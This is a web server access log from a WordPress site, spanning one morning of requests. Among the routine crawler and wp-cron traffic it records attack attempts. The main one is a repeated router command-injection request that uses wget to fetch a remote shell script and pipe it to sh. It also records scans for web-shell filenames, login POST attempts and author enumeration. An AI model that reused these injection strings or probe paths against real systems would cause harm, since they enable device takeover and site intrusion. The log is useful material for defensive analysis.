34.187.219.10 - - [28/Aug/2025:06:26:57 +0800] "HEAD /wp HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
34.187.219.10 - - [28/Aug/2025:06:26:57 +0800] "HEAD /bc HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
34.187.219.10 - - [28/Aug/2025:06:26:58 +0800] "HEAD /bk HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
34.187.219.10 - - [28/Aug/2025:06:26:59 +0800] "HEAD /backup HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
34.187.219.10 - - [28/Aug/2025:06:27:00 +0800] "HEAD /old HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
34.187.219.10 - - [28/Aug/2025:06:27:01 +0800] "HEAD /new HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
34.187.219.10 - - [28/Aug/2025:06:27:01 +0800] "HEAD /news/ HTTP/1.1" 200 0 "http://cqqizhou.com/new" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
34.187.219.10 - - [28/Aug/2025:06:27:02 +0800] "HEAD /main HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
34.187.219.10 - - [28/Aug/2025:06:27:03 +0800] "HEAD /home HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
34.187.219.10 - - [28/Aug/2025:06:27:03 +0800] "HEAD / HTTP/1.1" 200 0 "http://cqqizhou.com/home" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
36.133.115.36 - - [28/Aug/2025:06:38:20 +0800] "POST /wp-cron.php?doing_wp_cron=1756334299.9755210876464843750000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
196.251.84.253 - - [28/Aug/2025:06:38:20 +0800] "GET / HTTP/1.0" 200 151647 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0"
36.133.115.36 - - [28/Aug/2025:06:45:27 +0800] "POST /wp-cron.php?doing_wp_cron=1756334727.4010970592498779296875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [28/Aug/2025:06:45:27 +0800] "GET / HTTP/1.1" 200 33395 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [28/Aug/2025:06:46:10 +0800] "POST /wp-cron.php?doing_wp_cron=1756334770.6642711162567138671875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
173.252.83.5 - - [28/Aug/2025:06:46:10 +0800] "GET /robots.txt HTTP/1.1" 200 390 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
211.230.209.244 - - [28/Aug/2025:06:52:27 +0800] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0/router.tplink.sh%20-O-%7Csh) HTTP/1.1" 499 0 "-" "-"
211.230.209.244 - - [28/Aug/2025:06:52:27 +0800] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0/router.tplink.sh%20-O-%7Csh) HTTP/1.1" 499 0 "-" "-"
36.133.115.36 - - [28/Aug/2025:06:52:28 +0800] "POST /wp-cron.php?doing_wp_cron=1756335148.1558170318603515625000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
125.139.58.46 - - [28/Aug/2025:06:58:24 +0800] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1" 499 0 "-" "-"
125.139.58.46 - - [28/Aug/2025:06:58:24 +0800] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1" 499 0 "-" "-"
36.133.115.36 - - [28/Aug/2025:06:58:25 +0800] "POST /wp-cron.php?doing_wp_cron=1756335505.3448109626770019531250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.133.115.36 - - [28/Aug/2025:07:16:17 +0800] "POST /wp-cron.php?doing_wp_cron=1756336577.0187890529632568359375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
147.185.133.146 - - [28/Aug/2025:07:16:17 +0800] "GET / HTTP/1.1" 200 33395 "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
36.133.115.36 - - [28/Aug/2025:07:17:42 +0800] "POST /wp-cron.php?doing_wp_cron=1756336662.3104500770568847656250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
128.199.8.140 - - [28/Aug/2025:07:17:42 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
128.199.8.140 - - [28/Aug/2025:07:17:43 +0800] "GET / HTTP/1.1" 200 33857 "http://36.133.115.36" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
36.133.115.36 - - [28/Aug/2025:07:20:40 +0800] "POST /wp-cron.php?doing_wp_cron=1756336840.6337730884552001953125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.135.145.77 - - [28/Aug/2025:07:20:40 +0800] "GET / HTTP/1.1" 200 33395 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [28/Aug/2025:07:29:40 +0800] "POST /wp-cron.php?doing_wp_cron=1756337380.7624208927154541015625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.130.26.3 - - [28/Aug/2025:07:29:40 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.130.26.3 - - [28/Aug/2025:07:29:42 +0800] "GET / HTTP/1.1" 200 33395 "http://36.133.115.36" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [28/Aug/2025:07:46:54 +0800] "POST /wp-cron.php?doing_wp_cron=1756338414.6472198963165283203125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [28/Aug/2025:07:46:54 +0800] "GET / HTTP/1.1" 200 33395 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [28/Aug/2025:07:51:20 +0800] "POST /wp-cron.php?doing_wp_cron=1756338680.4128720760345458984375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
172.121.111.9 - - [28/Aug/2025:07:51:21 +0800] "GET / HTTP/1.1" 200 151669 "-" "-"
36.133.115.36 - - [28/Aug/2025:07:52:08 +0800] "POST /wp-cron.php?doing_wp_cron=1756338728.1474618911743164062500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
91.224.92.17 - - [28/Aug/2025:07:52:27 +0800] "GET / HTTP/1.1" 200 96805 "-" "-"
36.133.115.36 - - [28/Aug/2025:08:00:11 +0800] "POST /wp-cron.php?doing_wp_cron=1756339211.2821409702301025390625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
147.185.132.31 - - [28/Aug/2025:08:00:11 +0800] "GET / HTTP/1.0" 301 0 "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
36.133.108.121 - - [28/Aug/2025:08:00:27 +0800] "HEAD /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36"
105.159.128.234 - - [28/Aug/2025:08:07:51 +0800] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1" 499 0 "-" "-"
36.133.115.36 - - [28/Aug/2025:08:07:52 +0800] "POST /wp-cron.php?doing_wp_cron=1756339672.5504510402679443359375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
105.159.128.234 - - [28/Aug/2025:08:07:52 +0800] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1" 499 0 "-" "-"
36.133.115.36 - - [28/Aug/2025:08:19:14 +0800] "POST /wp-cron.php?doing_wp_cron=1756340354.6221129894256591796875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
107.175.141.10 - - [28/Aug/2025:08:19:15 +0800] "GET / HTTP/1.1" 200 151669 "-" "-"
36.133.115.36 - - [28/Aug/2025:08:22:00 +0800] "POST /wp-cron.php?doing_wp_cron=1756340520.7134308815002441406250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.253 - - [28/Aug/2025:08:22:01 +0800] "GET / HTTP/1.1" 200 151669 "-" "-"
37.59.22.99 - - [28/Aug/2025:08:25:12 +0800] "GET / HTTP/1.1" 200 33857 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
43.138.104.213 - - [28/Aug/2025:08:39:37 +0800] "OPTIONS / HTTP/1.0" 405 150 "-" "-"
36.133.115.36 - - [28/Aug/2025:08:45:57 +0800] "POST /wp-cron.php?doing_wp_cron=1756341957.6413650512695312500000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
182.44.9.147 - - [28/Aug/2025:08:45:57 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
182.44.9.147 - - [28/Aug/2025:08:46:03 +0800] "GET / HTTP/1.1" 200 33395 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [28/Aug/2025:08:48:22 +0800] "POST /wp-cron.php?doing_wp_cron=1756342102.7114388942718505859375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.138.104.213 - - [28/Aug/2025:08:48:22 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0)"
43.138.104.213 - - [28/Aug/2025:08:48:24 +0800] "GET / HTTP/1.1" 200 33857 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0)"
36.133.115.36 - - [28/Aug/2025:08:58:07 +0800] "POST /wp-cron.php?doing_wp_cron=1756342687.1601359844207763671875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [28/Aug/2025:08:58:07 +0800] "GET / HTTP/1.1" 200 33395 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [28/Aug/2025:09:18:47 +0800] "POST /wp-cron.php?doing_wp_cron=1756343927.8368151187896728515625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
103.142.102.122 - - [28/Aug/2025:09:18:47 +0800] "GET /index.php?m=wap&a=index&siteid=1 HTTP/1.1" 301 5 "-" "python-requests/2.32.5"
103.142.102.122 - - [28/Aug/2025:09:18:48 +0800] "GET /?m=wap&a=index&siteid=1 HTTP/1.1" 200 19288 "-" "python-requests/2.32.5"
162.243.204.15 - - [28/Aug/2025:09:19:18 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
162.243.204.15 - - [28/Aug/2025:09:19:19 +0800] "GET / HTTP/1.1" 200 33857 "http://36.133.115.36/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
162.243.204.15 - - [28/Aug/2025:09:19:20 +0800] "GET /form.html HTTP/1.1" 404 8990 "-" "curl/8.1.2"
162.243.204.15 - - [28/Aug/2025:09:19:21 +0800] "GET /upl.php HTTP/1.1" 404 47 "-" "Mozilla/5.0"
162.243.204.15 - - [28/Aug/2025:09:19:22 +0800] "GET /t4 HTTP/1.1" 404 8990 "-" "Mozilla/5.0"
162.243.204.15 - - [28/Aug/2025:09:19:23 +0800] "GET /geoip/ HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
162.243.204.15 - - [28/Aug/2025:09:19:24 +0800] "GET /1.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
162.243.204.15 - - [28/Aug/2025:09:19:25 +0800] "GET /systembc/password.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
162.243.204.15 - - [28/Aug/2025:09:19:25 +0800] "GET /password.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
58.40.8.206 - - [28/Aug/2025:09:53:19 +0800] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1" 499 0 "-" "-"
58.40.8.206 - - [28/Aug/2025:09:53:19 +0800] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1" 499 0 "-" "-"
36.133.115.36 - - [28/Aug/2025:09:53:19 +0800] "POST /wp-cron.php?doing_wp_cron=1756345999.9343020915985107421875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.133.115.36 - - [28/Aug/2025:09:58:34 +0800] "POST /wp-cron.php?doing_wp_cron=1756346314.4347100257873535156250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [28/Aug/2025:09:58:34 +0800] "GET / HTTP/1.1" 200 33395 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [28/Aug/2025:10:06:22 +0800] "POST /wp-cron.php?doing_wp_cron=1756346782.1696319580078125000000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
107.189.2.51 - - [28/Aug/2025:10:06:22 +0800] "GET /wp-login.php HTTP/1.1" 200 2781 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53"
107.189.2.51 - - [28/Aug/2025:10:06:24 +0800] "POST /wp-login.php HTTP/1.1" 200 2926 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53"
36.133.115.36 - - [28/Aug/2025:10:23:26 +0800] "POST /wp-cron.php?doing_wp_cron=1756347806.7159860134124755859375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
180.76.30.23 - - [28/Aug/2025:10:23:26 +0800] "GET / HTTP/1.1" 301 5 "http://m.baidu.com/s?wd=hard7y6" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"
180.76.30.40 - - [28/Aug/2025:10:23:27 +0800] "GET / HTTP/1.1" 200 33857 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"
36.133.115.36 - - [28/Aug/2025:10:33:29 +0800] "POST /wp-cron.php?doing_wp_cron=1756348409.5255689620971679687500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.79.8.221 - - [28/Aug/2025:10:33:29 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 zgrab/0.x"
36.133.115.36 - - [28/Aug/2025:10:37:40 +0800] "POST /wp-cron.php?doing_wp_cron=1756348660.3551979064941406250000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
196.251.84.253 - - [28/Aug/2025:10:37:41 +0800] "GET / HTTP/1.0" 200 151647 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0"
36.133.115.36 - - [28/Aug/2025:10:40:08 +0800] "POST /wp-cron.php?doing_wp_cron=1756348808.3552119731903076171875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
185.180.140.110 - - [28/Aug/2025:10:40:08 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.140.109 - - [28/Aug/2025:10:40:09 +0800] "GET / HTTP/1.1" 200 33857 "http://36.133.115.36/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
36.133.115.36 - - [28/Aug/2025:10:49:19 +0800] "POST /wp-cron.php?doing_wp_cron=1756349359.4723429679870605468750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
141.95.53.61 - - [28/Aug/2025:10:49:19 +0800] "GET /wp-login.php HTTP/1.1" 200 2781 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
141.95.53.61 - - [28/Aug/2025:10:49:21 +0800] "POST /wp-login.php HTTP/1.1" 200 2973 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
72.144.141.101 - - [28/Aug/2025:10:49:21 +0800] "GET /.alf.php HTTP/1.1" 404 27 "-" "-"
72.144.141.101 - - [28/Aug/2025:10:49:21 +0800] "GET /.bod/.ll/ss.php HTTP/1.1" 404 27 "-" "-"
72.144.141.101 - - [28/Aug/2025:10:49:22 +0800] "GET /aa.php HTTP/1.1" 404 27 "-" "-"
72.144.141.101 - - [28/Aug/2025:10:49:22 +0800] "GET /about.php HTTP/1.1" 404 27 "-" "-"
72.144.141.101 - - [28/Aug/2025:10:49:22 +0800] "GET /admin.php HTTP/1.1" 404 27 "-" "-"
72.144.141.101 - - [28/Aug/2025:10:49:22 +0800] "GET /akc.php HTTP/1.1" 404 27 "-" "-"
72.144.141.101 - - [28/Aug/2025:10:49:23 +0800] "GET /alfa.php HTTP/1.1" 404 27 "-" "-"
72.144.141.101 - - [28/Aug/2025:10:49:23 +0800] "GET /asasx.php HTTP/1.1" 404 27 "-" "-"
72.144.141.101 - - [28/Aug/2025:10:49:23 +0800] "GET /atomlib.php HTTP/1.1" 404 27 "-" "-"
72.144.141.101 - - [28/Aug/2025:10:49:23 +0800] "GET /autoload_classmap.php HTTP/1.1" 404 27 "-" "-"
72.144.141.101 - - [28/Aug/2025:10:49:23 +0800] "GET /autoload_classmap/function.php HTTP/1.1" 404 27 "-" "-"
72.144.141.101 - - [28/Aug/2025:10:49:24 +0800] "GET /buy.php HTTP/1.1" 404 27 "-" "-"
72.144.141.101 - - [28/Aug/2025:10:49:24 +0800] "GET /chosen.php HTTP/1.1" 404 27 "-" "-"
72.144.141.101 - - [28/Aug/2025:10:49:24 +0800] "GET /classwithtostring.php HTTP/1.1" 404 27 "-" "-"
72.144.141.101 - - [28/Aug/2025:10:49:24 +0800] "GET /cong.php HTTP/1.1" 404 27 "-" "-"
72.144.141.101 - - [28/Aug/2025:10:49:25 +0800] "GET /edit.php HTTP/1.1" 404 27 "-" "-"
72.144.141.101 - - [28/Aug/2025:10:49:25 +0800] "GET /file.php HTTP/1.1" 404 27 "-" "-"
72.144.141.101 - - [28/Aug/2025:10:49:25 +0800] "GET /file2.php HTTP/1.1" 404 27 "-" "-"
72.144.141.101 - - [28/Aug/2025:10:49:25 +0800] "GET /flower.php HTTP/1.1" 404 27 "-" "-"
72.144.141.101 - - [28/Aug/2025:10:49:25 +0800] "GET /gecko.php HTTP/1.1" 404 27 "-" "-"
72.144.141.101 - - [28/Aug/2025:10:49:26 +0800] "GET /goat.php HTTP/1.1" 404 27 "-" "-"
72.144.141.101 - - [28/Aug/2025:10:49:26 +0800] "GET /goods.php HTTP/1.1" 404 27 "-" "-"
72.144.141.101 - - [28/Aug/2025:10:49:26 +0800] "GET /ioxi-o.php HTTP/1.1" 404 27 "-" "-"
72.144.141.101 - - [28/Aug/2025:10:49:26 +0800] "GET /lock360.php HTTP/1.1" 404 27 "-" "-"
72.144.141.101 - - [28/Aug/2025:10:49:27 +0800] "GET /makeasmtp.php HTTP/1.1" 404 27 "-" "-"
72.144.141.101 - - [28/Aug/2025:10:49:27 +0800] "GET /mm.php HTTP/1.1" 404 27 "-" "-"
72.144.141.101 - - [28/Aug/2025:10:49:27 +0800] "GET /nc4.php HTTP/1.1" 404 27 "-" "-"
72.144.141.101 - - [28/Aug/2025:10:49:27 +0800] "GET /tinyfilemanager.php HTTP/1.1" 404 27 "-" "-"
72.144.141.101 - - [28/Aug/2025:10:49:28 +0800] "GET /users.php HTTP/1.1" 404 27 "-" "-"
72.144.141.101 - - [28/Aug/2025:10:49:28 +0800] "GET /w.php HTTP/1.1" 404 27 "-" "-"
72.144.141.101 - - [28/Aug/2025:10:49:29 +0800] "GET /wp-admin/ HTTP/1.1" 302 5 "-" "-"
72.144.141.101 - - [28/Aug/2025:10:49:29 +0800] "GET /wp-login.php?redirect_to=http%3A%2F%2Fcqqizhou.com%2Fwp-admin%2F&reauth=1 HTTP/1.1" 200 8672 "-" "-"
72.144.141.101 - - [28/Aug/2025:10:49:30 +0800] "GET /wp-admin/css/colors/blue/index.php HTTP/1.1" 404 27 "-" "-"
72.144.141.101 - - [28/Aug/2025:10:49:30 +0800] "GET /wp-admin/images/moon.php HTTP/1.1" 404 27 "-" "-"
72.144.141.101 - - [28/Aug/2025:10:49:30 +0800] "GET /wp-admin/js/index.php HTTP/1.1" 404 27 "-" "-"
72.144.141.101 - - [28/Aug/2025:10:49:31 +0800] "GET /wp-admin/setup-config.php HTTP/1.1" 409 2667 "-" "-"
72.144.141.101 - - [28/Aug/2025:10:49:31 +0800] "GET /wp-api.php HTTP/1.1" 404 27 "-" "-"
72.144.141.101 - - [28/Aug/2025:10:49:31 +0800] "GET /wp-content/index.php HTTP/1.1" 200 5 "-" "-"
72.144.141.101 - - [28/Aug/2025:10:49:31 +0800] "GET /wp-content/wp-conflg.php HTTP/1.1" 404 27 "-" "-"
72.144.141.101 - - [28/Aug/2025:10:49:31 +0800] "GET /wp-includes/IXR/autoload_classmap.php HTTP/1.1" 404 27 "-" "-"
72.144.141.101 - - [28/Aug/2025:10:49:32 +0800] "GET /wp-includes/fonts/admin.php HTTP/1.1" 404 27 "-" "-"
72.144.141.101 - - [28/Aug/2025:10:49:32 +0800] "GET /wp-includes/fonts/index.php HTTP/1.1" 404 27 "-" "-"
72.144.141.101 - - [28/Aug/2025:10:49:32 +0800] "GET /wp-setup.php HTTP/1.1" 404 27 "-" "-"
72.144.141.101 - - [28/Aug/2025:10:49:32 +0800] "GET /wp.php HTTP/1.1" 404 27 "-" "-"
72.144.141.101 - - [28/Aug/2025:10:49:33 +0800] "GET /wsa.php HTTP/1.1" 404 27 "-" "-"
36.133.115.36 - - [28/Aug/2025:10:58:02 +0800] "POST /wp-cron.php?doing_wp_cron=1756349882.4260630607604980468750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.253 - - [28/Aug/2025:10:58:03 +0800] "GET / HTTP/1.1" 200 151669 "-" "-"
36.133.115.36 - - [28/Aug/2025:10:59:01 +0800] "POST /wp-cron.php?doing_wp_cron=1756349941.7074680328369140625000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [28/Aug/2025:10:59:02 +0800] "GET / HTTP/1.1" 200 33395 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [28/Aug/2025:11:15:14 +0800] "POST /wp-cron.php?doing_wp_cron=1756350914.2636849880218505859375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
49.51.196.42 - - [28/Aug/2025:11:15:14 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
49.51.196.42 - - [28/Aug/2025:11:15:16 +0800] "GET / HTTP/1.1" 200 33395 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
139.210.147.194 - - [28/Aug/2025:11:21:46 +0800] "GET http://cqqizhou.com/ HTTP/1.1" 200 33857 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.22"
36.133.115.36 - - [28/Aug/2025:11:21:48 +0800] "POST /wp-cron.php?doing_wp_cron=1756351308.0263469219207763671875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
119.51.241.185 - - [28/Aug/2025:11:21:48 +0800] "GET http://www.cqqizhou.com/ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.10"
119.51.241.185 - - [28/Aug/2025:11:21:48 +0800] "GET http://cqqizhou.com/ HTTP/1.1" 200 33857 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.10"
23.239.106.226 - - [28/Aug/2025:11:29:51 +0800] "GET / HTTP/1.1" 200 33857 "https://www.google.es" "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0"
36.133.115.36 - - [28/Aug/2025:11:29:53 +0800] "POST /wp-cron.php?doing_wp_cron=1756351793.2260050773620605468750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
23.239.106.226 - - [28/Aug/2025:11:29:53 +0800] "GET /index.php?author=1 HTTP/1.1" 301 5 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
23.239.106.226 - - [28/Aug/2025:11:29:54 +0800] "GET /author/admin/ HTTP/1.1" 200 25122 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
